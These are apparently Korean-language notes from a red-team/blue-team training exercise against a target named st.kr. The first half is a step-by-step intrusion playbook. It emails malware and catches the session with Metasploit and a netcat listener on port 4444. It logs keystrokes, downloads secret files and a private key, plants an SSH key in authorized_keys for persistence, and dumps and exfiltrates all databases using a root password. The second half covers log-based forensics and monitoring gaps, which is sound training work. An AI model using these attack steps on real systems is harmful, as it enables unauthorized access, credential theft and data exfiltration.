미션4: 제한시간 10분
미션1,2,3완료 후 키 인증 방식으로 변경
공격 대상 : st.kr
공격 순서
1) 스캔
2) 악성코드 메일로 보내기
3) 해커와 연결
nano malware.rc
netstat -ant | grep 4444
nc -l -p 4444
msfconsole -r /home/kali/malware.rc
keyscan_start
keyscan_dump
download C:\\Users\\Administrator\\Desktop\\secret.txt /home/kali/
download
ls
(현재 경로 C:\Users\manager\Desktop 확인)
show_mount (드라이브 보기)
cd Z:\ (Z폴더로 이동)
ls
download (파일이름)
(completed : 파일 -> /home/kali/파일(저장 경로확인))
download -f pkey.ppk ?
4) 인증키 찾고 비밀번호 획득
cd /home/master/.ssh
cat authorized_keys (비어있음)
cat id_ed25519.pub >> authorized_keys
sz id_ed25519 (저장)
5) 외부 접속
웹페이지 전체 백업 후 유출
데이터베이스 전체 백업후 유출
mysqldump -u root -p123456 --all-databases > /home/newhome.sql (전체백업)
tar cvzf home.tar.gz ./ (압축)
cp home.tar.gz /backup (유출)
----------------------------------------------------------------------------
로그 기록 확인하기
순서
4532167
3672145
유출 증거 확보
관리자 pc 전체 이미징 작업 진행 예정
1) 서버의 로그 기록 확보
/var/log/auth.log
2025-02-14T12:12:22.549499+09:00 mail sshd[3744]: Accepted publickey for master from 192.168.0.213 port 17879 ssh2: ED25519 SHA256:g
41apAHOw6H/tQSV+UxxAsF4Dc/B4Vz72xnrQDC6X54
>auth.log에 본인의 접속 ip가 있는가?
2) RSUSLOG의 데이터 기록 전체 확보 후 각자 분석
ssh master@10.10.10.251
su
mysql
show databases;
use Syslog;
show tables;
desc SystemEvents;
select id, RecievedAt, FromHost, Message FROM Syslog.SystemEvents where FromHost="mail" and Message like "%192.168.0.213%" order by id desc;
=> 페이지가 너무 많아서 오류
> RSYSLOG데이터에 본인의 접속 IP가 있는가?
3) 이메일 파일 확보 후 분석
2025-02-14T11:55:30.834813+09:00 mail dovecot: imap-login: Login: user=, method=PLAIN, rip=192.168.0.215, lip=10.0.2.15, mpid=2885, session=
> 이메일 로그에 본인의 ip가 있는가?
> 각자 관리자한테 보낸 악성코드 어디에 있는지 찾기
개선사항
관리자PC, UF 미설치, packetbeat미설치
ELK, 4444와의 연결 상태 확인 불가능